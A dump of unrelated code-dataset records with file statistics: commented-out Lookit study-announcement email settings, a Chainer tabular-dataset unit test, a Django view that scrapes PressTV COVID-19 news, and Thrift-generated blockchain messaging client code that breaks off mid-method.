# studyMessage = "This study for 7-month-olds (6 1/2 to 7 1/2 months) looks at babies' perception of shapes: we're interested in whether infants pick up on features essential to Euclidean geometry, like relative lengths and angles, even across changes in a shape's size and orientation. <br><br> In this 10-minute study, your baby watches short videos of two changing streams of angles, one on each side of the screen. On one side, the angles will be changing in shape and size, and on the other side, they will be changing in size alone. We measure how long your baby looks at each of the two streams of angles to see which changes he or she finds more noticeable and interesting. <br><br> You'll earn a $5 Amazon gift card for participating (one gift card per child)! <br><br> To learn more or get started, visit <a href='https://lookit.mit.edu/studies/849b547f-5199-4aa0-892d-a96262080dc8/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
#
# BABY LAUGHTER
# ageRangeDays = (88, 915)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentlaughterannouncement.txt'
# expId = 'd4cbfabc-ea53-4877-bc55-c701426fd13b'
# studyName = 'Baby Laughter Games'
# studyMessage = "In this study from Caspar Addyman's group at Goldsmiths, University of London, you and your baby will perform a series of short games, including \"Peekaboo.\" We are interested in the different kinds of things that make babies laugh at different ages. Smiles and laughter transcend barriers of age, language and culture. Babies know this better than anyone -- they even began smiling in the womb!<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/d4cbfabc-ea53-4877-bc55-c701426fd13b/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids around the same age? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
#
# FLURPS AND ZAZZES
# ageRangeDays = (365*6, 365*8)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentflurpsannouncement_corrected.txt'
# expId = '1e9157cd-b898-4098-9429-a599720d0c0a'
# studyName = 'Flurps and Zazzes'
# studyMessage = "This study for 6- and 7-year-olds looks at how young children expect social groups to affect people's behavior. In this 15-minute study, your child will see and hear a story about two groups of kids building towers. Then we'll ask him or her to guess how the kids will behave towards others in their own group and the opposite group, and how much the kids will have in common with their group members. Your child's responses can help teach scientists about how moral and social reasoning develop. <br><br> You'll earn a $5 Amazon gift card for participating (one gift card per child)! <br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/1e9157cd-b898-4098-9429-a599720d0c0a/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. We need help spreading the word about this study, as we're not really sure how best to reach parents online. Do you have any friends with kids in the age range? Or are you up for sharing on a local parenting Facebook group or listserv? We'd be so grateful for any help!<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
#
# POLITENESS
# ageRangeDays = (730, 1461)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentpolitenessannouncement.txt'
# expId = 'b40b6731-2fec-4df4-a12f-d38c7be3015e'
# studyName = 'Mind and Manners'
# studyMessage = "This study for 2- through 4-year-olds looks at how kids learn what it means to be polite. <br><br> In this 15-minute study, your child will listen to short stories where people make requests, and answer questions about the characters by pointing. <br><br> To learn more or get started, visit <a href='https://lookit.mit.edu/studies/b40b6731-2fec-4df4-a12f-d38c7be3015e/' target=_blank>the study</a> on Lookit!<br><br> You'll earn a $4 Amazon gift card for participating (one gift card per child)! <br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids around the same age? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
#
# PHYSICS
# ageRangeDays = (6*30, 11*30) # advertise in slightly narrower age range than need, so we don't prompt everyone to start at 4mo
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentphysicsannouncement.txt'
# expId = 'cfddb63f-12e9-4e62-abd1-47534d6c4dd2'
# studyName = 'Your baby, the physicist'
# studyMessage = "This study for 4- to 12-month-olds looks at how babies intuitively expect physical forces to work. During each study session, your baby watches pairs of short videos of physical events. On one side, something pretty normal happens: e.g., a ball rolls off a table and falls to the ground. On the other side, something surprising happens: e.g., the ball rolls off a table and falls UP! <br><br>This study will be one of the first to look in detail not just at infants' abilities collectively, but at individual differences in their expectations and styles of responding.<br><br>To better understand individual children's responses, we especially need dedicated families to complete multiple experiment sessions (up to 12). After each session, we'll email you a $5 Amazon gift card as a thank-you! (One gift card per child per session, up to 12 sessions; $5 bonus for 12th session. Child must be in the age range for the study and be visible in the consent video, so that we don't go broke paying random adults on the internet.) <br><br> Although every session helps, if you complete at least 12 sessions over the course of 2 months, we'll also be able to send you a personalized report about your child's looking patterns once video coding for the study is complete. (Sad note about how long careful science takes: this is likely to be in a few years.)<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/cfddb63f-12e9-4e62-abd1-47534d6c4dd2/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with babies around the same age? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
# maxToSend = 20
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
#
#
# LOOK AND LISTEN
# ageRangeDays = (120, 545)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentintermodalannouncement.txt'
# expId = '81ac992b-ab3a-4b0b-afab-258356dee962'
# studyName = 'Look and Listen'
# studyMessage = "This study for 4- to 18-month-olds looks at how babies put together what they see and what they hear. In this five-minute study, your child watches videos of two speakers on the screen saying nonsense syllables. The sound matches just one of the speakers. We'll measure where he or she looks longer, to better understand how babies pay attention to what they see and hear when people are speaking to them. <br><br>After you participate, we'll email you a $4 Amazon gift card as a thank-you. (One gift card per child; child must be in the age range for the study.)<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/81ac992b-ab3a-4b0b-afab-258356dee962/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with babies around the same age? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
#
| 138.941606 | 2,311 | 0.76538 | 3,171 | 19,035 | 4.582151 | 0.175339 | 0.022023 | 0.0117 | 0.019683 | 0.75031 | 0.717412 | 0.709566 | 0.688713 | 0.684308 | 0.679215 | 0 | 0.04426 | 0.144208 | 19,035 | 136 | 2,312 | 139.963235 | 0.847698 | 0.781087 | 0 | 0.705882 | 0 | 0.117647 | 0.846972 | 0.075155 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
558e136769361c7096f8178d91e0395363c435cd | 12,247 | py | Python | tests/chainer_tests/dataset_tests/tabular_tests/test_from_data.py | zjzh/chainer | e9da1423255c58c37be9733f51b158aa9b39dc93 | [
"MIT"
] | 3,705 | 2017-06-01T07:36:12.000Z | 2022-03-30T10:46:15.000Z | tests/chainer_tests/dataset_tests/tabular_tests/test_from_data.py | zjzh/chainer | e9da1423255c58c37be9733f51b158aa9b39dc93 | [
"MIT"
] | 5,998 | 2017-06-01T06:40:17.000Z | 2022-03-08T01:42:44.000Z | tests/chainer_tests/dataset_tests/tabular_tests/test_from_data.py | zjzh/chainer | e9da1423255c58c37be9733f51b158aa9b39dc93 | [
"MIT"
] | 1,150 | 2017-06-02T03:39:46.000Z | 2022-03-29T02:29:32.000Z | import unittest
import numpy as np
import chainer
from chainer.dataset import tabular
from chainer import testing
class TestFromData(unittest.TestCase):
def test_unary_array(self):
dataset = tabular.from_data(np.arange(10))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 1)
self.assertIsNone(dataset.mode)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, [1, 3])
self.assertIsInstance(output, np.ndarray)
def test_unary_array_with_key(self):
dataset = tabular.from_data(('a', np.arange(10)))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(dataset.keys, ('a',))
self.assertIsNone(dataset.mode)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, [1, 3])
self.assertIsInstance(output, np.ndarray)
def test_unary_list(self):
dataset = tabular.from_data([2, 7, 1, 8, 4, 5, 9, 0, 3, 6])
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 1)
self.assertIsNone(dataset.mode)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, [7, 8])
self.assertIsInstance(output, list)
def test_unary_list_with_key(self):
dataset = tabular.from_data(('a', [2, 7, 1, 8, 4, 5, 9, 0, 3, 6]))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(dataset.keys, ('a',))
self.assertIsNone(dataset.mode)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, [7, 8])
self.assertIsInstance(output, list)
def test_unary_callable_unary(self):
dataset = tabular.from_data(('a', lambda i: i * i), size=10)
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(dataset.keys, ('a',))
self.assertIsNone(dataset.mode)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, [1, 9])
self.assertIsInstance(output, list)
def test_unary_callable_tuple(self):
dataset = tabular.from_data(
(('a', 'b'), lambda i: (i * i, -i)), size=10)
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(dataset.keys, ('a', 'b'))
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 9], [-1, -3]))
for out in output:
self.assertIsInstance(out, list)
def test_unary_callable_dict(self):
dataset = tabular.from_data(
(('a', 'b'), lambda i: {'a': i * i, 'b': -i}), size=10)
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(dataset.keys, ('a', 'b'))
self.assertEqual(dataset.mode, dict)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, {'a': [1, 9], 'b': [-1, -3]})
for out in output.values():
self.assertIsInstance(out, list)
def test_unary_callable_without_key(self):
with self.assertRaises(ValueError):
tabular.from_data(lambda i: i * i, size=10)
def test_unary_callable_without_size(self):
with self.assertRaises(ValueError):
tabular.from_data(('a', lambda i: i * i))
def test_tuple_array_list(self):
dataset = tabular.from_data(
(np.arange(10), [2, 7, 1, 8, 4, 5, 9, 0, 3, 6]))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 2)
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 3], [7, 8]))
self.assertIsInstance(output[0], np.ndarray)
self.assertIsInstance(output[1], list)
def test_tuple_array_with_key_list(self):
dataset = tabular.from_data(
(('a', np.arange(10)), [2, 7, 1, 8, 4, 5, 9, 0, 3, 6]))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 2)
self.assertEqual(dataset.keys[0], 'a')
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 3], [7, 8]))
self.assertIsInstance(output[0], np.ndarray)
self.assertIsInstance(output[1], list)
def test_tuple_array_list_with_key(self):
dataset = tabular.from_data(
(np.arange(10), ('b', [2, 7, 1, 8, 4, 5, 9, 0, 3, 6])))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 2)
self.assertEqual(dataset.keys[1], 'b')
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 3], [7, 8]))
self.assertIsInstance(output[0], np.ndarray)
self.assertIsInstance(output[1], list)
def test_tuple_array_callable_unary(self):
dataset = tabular.from_data((np.arange(10), ('b', lambda i: i * i)))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 2)
self.assertEqual(dataset.keys[1], 'b')
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 3], [1, 9]))
self.assertIsInstance(output[0], np.ndarray)
self.assertIsInstance(output[1], list)
def test_tuple_array_callable_tuple(self):
dataset = tabular.from_data(
(np.arange(10), (('b', 'c'), lambda i: (i * i, -i))))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 3)
self.assertEqual(dataset.keys[1:], ('b', 'c'))
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 3], [1, 9], [-1, -3]))
self.assertIsInstance(output[0], np.ndarray)
self.assertIsInstance(output[1], list)
def test_tuple_array_callable_dict(self):
dataset = tabular.from_data(
(np.arange(10), (('b', 'c'), lambda i: {'b': i * i, 'c': -i})))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 3)
self.assertEqual(dataset.keys[1:], ('b', 'c'))
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 3], [1, 9], [-1, -3]))
self.assertIsInstance(output[0], np.ndarray)
self.assertIsInstance(output[1], list)
def test_tuple_array_with_key_callable_unary(self):
dataset = tabular.from_data(
(('a', np.arange(10)), ('b', lambda i: i * i)))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(dataset.keys, ('a', 'b'))
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 3], [1, 9]))
self.assertIsInstance(output[0], np.ndarray)
self.assertIsInstance(output[1], list)
def test_tuple_callable_unary_callable_unary(self):
dataset = tabular.from_data(
(('a', lambda i: i * i), ('b', lambda i: -i)), size=10)
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(dataset.keys, ('a', 'b'))
self.assertEqual(dataset.mode, tuple)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, ([1, 9], [-1, -3]))
self.assertIsInstance(output[0], list)
self.assertIsInstance(output[1], list)
def test_tuple_callable_unary_callable_unary_without_size(self):
with self.assertRaises(ValueError):
tabular.from_data((('a', lambda i: i * i), ('b', lambda i: -i)))
def test_dict_array_list(self):
dataset = tabular.from_data(
{'a': np.arange(10), 'b': [2, 7, 1, 8, 4, 5, 9, 0, 3, 6]})
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(set(dataset.keys), {'a', 'b'})
self.assertEqual(dataset.mode, dict)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, {'a': [1, 3], 'b': [7, 8]})
self.assertIsInstance(output['a'], np.ndarray)
self.assertIsInstance(output['b'], list)
def test_dict_array_callable_unary(self):
dataset = tabular.from_data({'a': np.arange(10), 'b': lambda i: i * i})
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(set(dataset.keys), {'a', 'b'})
self.assertEqual(dataset.mode, dict)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, {'a': [1, 3], 'b': [1, 9]})
self.assertIsInstance(output['a'], np.ndarray)
self.assertIsInstance(output['b'], list)
def test_dict_array_callable_tuple(self):
dataset = tabular.from_data(
{'a': np.arange(10), ('b', 'c'): lambda i: (i * i, -i)})
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(set(dataset.keys), {'a', 'b', 'c'})
self.assertEqual(dataset.mode, dict)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(
output, {'a': [1, 3], 'b': [1, 9], 'c': [-1, -3]})
self.assertIsInstance(output['a'], np.ndarray)
self.assertIsInstance(output['b'], list)
self.assertIsInstance(output['c'], list)
def test_dict_array_callable_dict(self):
dataset = tabular.from_data(
{'a': np.arange(10), ('b', 'c'): lambda i: {'b': i * i, 'c': -i}})
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(set(dataset.keys), {'a', 'b', 'c'})
self.assertEqual(dataset.mode, dict)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(
output, {'a': [1, 3], 'b': [1, 9], 'c': [-1, -3]})
self.assertIsInstance(output['a'], np.ndarray)
self.assertIsInstance(output['b'], list)
self.assertIsInstance(output['c'], list)
def test_dict_callable_unary_callable_unary(self):
dataset = tabular.from_data(
{'a': lambda i: i * i, 'b': lambda i: -i}, size=10)
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(set(dataset.keys), {'a', 'b'})
self.assertEqual(dataset.mode, dict)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, {'a': [1, 9], 'b': [-1, -3]})
self.assertIsInstance(output['a'], list)
self.assertIsInstance(output['b'], list)
def test_dict_callable_unary_callable_unary_without_size(self):
with self.assertRaises(ValueError):
tabular.from_data(({'a': lambda i: i * i, 'b': lambda i: -i}))
def test_unique(self):
dataset_a = tabular.from_data(np.arange(10))
dataset_b = tabular.from_data(np.arange(10))
self.assertNotEqual(dataset_a.keys, dataset_b.keys)
testing.run_module(__name__, __file__)
| 39.253205 | 79 | 0.616314 | 1,540 | 12,247 | 4.798052 | 0.045455 | 0.121803 | 0.116119 | 0.094735 | 0.963865 | 0.958316 | 0.941399 | 0.93558 | 0.879415 | 0.85925 | 0 | 0.030354 | 0.222585 | 12,247 | 311 | 80 | 39.379421 | 0.74572 | 0 | 0 | 0.720833 | 0 | 0 | 0.00792 | 0 | 0 | 0 | 0 | 0 | 0.604167 | 1 | 0.104167 | false | 0 | 0.020833 | 0 | 0.129167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e94c75fa374581f25226061c13d417072a542817 | 5,179 | py | Python | pressTv/views.py | jafarzadeh-1998/Coronavirus-News-Crawler | aae34075b0f39b4490b6b562a18a195addc8b554 | [
"MIT"
] | null | null | null | pressTv/views.py | jafarzadeh-1998/Coronavirus-News-Crawler | aae34075b0f39b4490b6b562a18a195addc8b554 | [
"MIT"
] | null | null | null | pressTv/views.py | jafarzadeh-1998/Coronavirus-News-Crawler | aae34075b0f39b4490b6b562a18a195addc8b554 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.http import JsonResponse
from django.views.generic import TemplateView
import requests, urllib, datetime
from bs4 import BeautifulSoup as bs
class index(TemplateView):
template_name = "pressTv/index.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
baseUrl = 'https://www.presstv.com/default/search?q={keyword}&from={from_}&to={to}§ion=1&page=1'
url = baseUrl.format(keyword="COVID-19",
to=str(datetime.date.today()),
from_=str(datetime.date.today() - datetime.timedelta(days=30)))
bsContainer = bs((requests.get(url=url).content), "html.parser")
newsLink = set()
newsList = []
for news in bsContainer.find_all("a", class_="result-item-link"):
link = "https://www.presstv.com" + news.get("href")
newsLink.add(link)
title = news.find("div", class_="result-item-title").get_text()
summary = news.find("div", class_="result-item-summery").get_text()
pubdate = news.find("span", class_="result-item-puddate").get_text()
datetime_pubdate = "".join(pubdate.split(",")[1:])
datetime_pubdate = datetime.datetime.strptime(datetime_pubdate, " %B %d %Y ")
newsList.append({"link":link,
"pubdate":pubdate,
"title":title,
"summary":summary,
"date": datetime_pubdate})
url = baseUrl.format(keyword="coronavirus",
to=str(datetime.date.today()),
from_=str(datetime.date.today() - datetime.timedelta(days=30)))
coronaContainer = bs((requests.get(url=url).content), "html.parser")
for news in coronaContainer.find_all("a", class_="result-item-link"):
link = "https://www.presstv.com" + news.get("href")
if link in newsLink:
continue
title = news.find("div", class_="result-item-title").get_text()
summary = news.find("div", class_="result-item-summery").get_text()
pubdate = news.find("span", class_="result-item-puddate").get_text()
datetime_pubdate = "".join(pubdate.split(",")[1:])
datetime_pubdate = datetime.datetime.strptime(datetime_pubdate, " %B %d %Y ")
newsList.append({"link":link,
"pubdate":pubdate,
"title":title,
"summary":summary,
"date": datetime_pubdate})
newsList = sorted(newsList, key=lambda n:n["date"], reverse=True)
context["newsList"] = newsList
return context
def changePage(request, pageNum):
baseUrl = 'https://www.presstv.com/default/search?q={keyword}&from={from_}&to={to}§ion=1&page='+pageNum
url = baseUrl.format(keyword="COVID-19",
to=str(datetime.date.today()),
from_=str(datetime.date.today() - datetime.timedelta(days=30)))
bsContainer = bs((requests.get(url=url).content), "html.parser")
newsLink = set()
newsList = []
for news in bsContainer.find_all("a", class_="result-item-link"):
link = "https://www.presstv.com" + news.get("href")
newsLink.add(link)
title = news.find("div", class_="result-item-title").get_text()
summary = news.find("div", class_="result-item-summery").get_text()
pubdate = news.find("span", class_="result-item-puddate").get_text()
datetime_pubdate = "".join(pubdate.split(",")[1:])
datetime_pubdate = datetime.datetime.strptime(datetime_pubdate, " %B %d %Y ")
newsList.append({"link":link,
"pubdate":pubdate,
"title":title,
"summary":summary,
"date": datetime_pubdate})
url = baseUrl.format(keyword="coronavirus",
to=str(datetime.date.today()),
from_=str(datetime.date.today() - datetime.timedelta(days=30)))
coronaContainer = bs((requests.get(url=url).content), "html.parser")
for news in coronaContainer.find_all("a", class_="result-item-link"):
link = "https://www.presstv.com" + news.get("href")
if link in newsLink:
continue
title = news.find("div", class_="result-item-title").get_text()
summary = news.find("div", class_="result-item-summery").get_text()
pubdate = news.find("span", class_="result-item-puddate").get_text()
datetime_pubdate = "".join(pubdate.split(",")[1:])
datetime_pubdate = datetime.datetime.strptime(datetime_pubdate, " %B %d %Y ")
newsList.append({"link":link,
"pubdate":pubdate,
"title":title,
"summary":summary,
"date": datetime_pubdate})
newsList = sorted(newsList, key=lambda n:n["date"], reverse=True)
return JsonResponse(data={"newsList": newsList})
| 50.281553 | 111 | 0.568063 | 562 | 5,179 | 5.129893 | 0.174377 | 0.061048 | 0.083247 | 0.055498 | 0.86854 | 0.86854 | 0.86854 | 0.86854 | 0.86854 | 0.86854 | 0 | 0.00535 | 0.278239 | 5,179 | 102 | 112 | 50.77451 | 0.765918 | 0 | 0 | 0.835165 | 0 | 0.021978 | 0.171269 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021978 | false | 0 | 0.054945 | 0 | 0.120879 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e95107f84646105e3e07564a837ce90479a66ace | 51,450 | py | Python | blockchain/gen/messaging/BlockchainService.py | ManazRT/Dragonchain | d119b23366b329bab0637e3d1979a665f07bb109 | [
"Apache-2.0"
] | null | null | null | blockchain/gen/messaging/BlockchainService.py | ManazRT/Dragonchain | d119b23366b329bab0637e3d1979a665f07bb109 | [
"Apache-2.0"
] | null | null | null | blockchain/gen/messaging/BlockchainService.py | ManazRT/Dragonchain | d119b23366b329bab0637e3d1979a665f07bb109 | [
"Apache-2.0"
] | null | null | null | #
# Autogenerated by Thrift Compiler (0.9.3)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
import logging
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def ping(self):
pass
def get_node_info(self):
pass
def register_node(self, node, pass_phrase):
"""
Parameters:
- node
- pass_phrase
"""
pass
def unregister_node(self, pass_phrase):
"""
Parameters:
- pass_phrase
"""
pass
def phase_1_message(self, p1):
"""
Parameters:
- p1
"""
pass
def phase_2_message(self, p2):
"""
Parameters:
- p2
"""
pass
def phase_3_message(self, p3):
"""
Parameters:
- p3
"""
pass
def phase_4_message(self, p4):
"""
Parameters:
- p4
"""
pass
def phase_5_message(self, p5):
"""
Parameters:
- p5
"""
pass
def get_peers(self):
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def ping(self):
self.send_ping()
self.recv_ping()
def send_ping(self):
self._oprot.writeMessageBegin('ping', TMessageType.CALL, self._seqid)
args = ping_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_ping(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = ping_result()
result.read(iprot)
iprot.readMessageEnd()
return
def get_node_info(self):
self.send_get_node_info()
return self.recv_get_node_info()
def send_get_node_info(self):
self._oprot.writeMessageBegin('get_node_info', TMessageType.CALL, self._seqid)
args = get_node_info_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_node_info(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = get_node_info_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.unauthorized is not None:
raise result.unauthorized
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_node_info failed: unknown result")
def register_node(self, node, pass_phrase):
"""
Parameters:
- node
- pass_phrase
"""
self.send_register_node(node, pass_phrase)
return self.recv_register_node()
def send_register_node(self, node, pass_phrase):
self._oprot.writeMessageBegin('register_node', TMessageType.CALL, self._seqid)
args = register_node_args()
args.node = node
args.pass_phrase = pass_phrase
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_register_node(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = register_node_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.unauthorized is not None:
raise result.unauthorized
raise TApplicationException(TApplicationException.MISSING_RESULT, "register_node failed: unknown result")
def unregister_node(self, pass_phrase):
"""
Parameters:
- pass_phrase
"""
self.send_unregister_node(pass_phrase)
def send_unregister_node(self, pass_phrase):
self._oprot.writeMessageBegin('unregister_node', TMessageType.ONEWAY, self._seqid)
args = unregister_node_args()
args.pass_phrase = pass_phrase
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def phase_1_message(self, p1):
"""
Parameters:
- p1
"""
self.send_phase_1_message(p1)
self.recv_phase_1_message()
def send_phase_1_message(self, p1):
self._oprot.writeMessageBegin('phase_1_message', TMessageType.CALL, self._seqid)
args = phase_1_message_args()
args.p1 = p1
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_phase_1_message(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = phase_1_message_result()
result.read(iprot)
iprot.readMessageEnd()
return
def phase_2_message(self, p2):
"""
Parameters:
- p2
"""
self.send_phase_2_message(p2)
self.recv_phase_2_message()
def send_phase_2_message(self, p2):
self._oprot.writeMessageBegin('phase_2_message', TMessageType.CALL, self._seqid)
args = phase_2_message_args()
args.p2 = p2
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_phase_2_message(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = phase_2_message_result()
result.read(iprot)
iprot.readMessageEnd()
return
def phase_3_message(self, p3):
"""
Parameters:
- p3
"""
self.send_phase_3_message(p3)
self.recv_phase_3_message()
def send_phase_3_message(self, p3):
self._oprot.writeMessageBegin('phase_3_message', TMessageType.CALL, self._seqid)
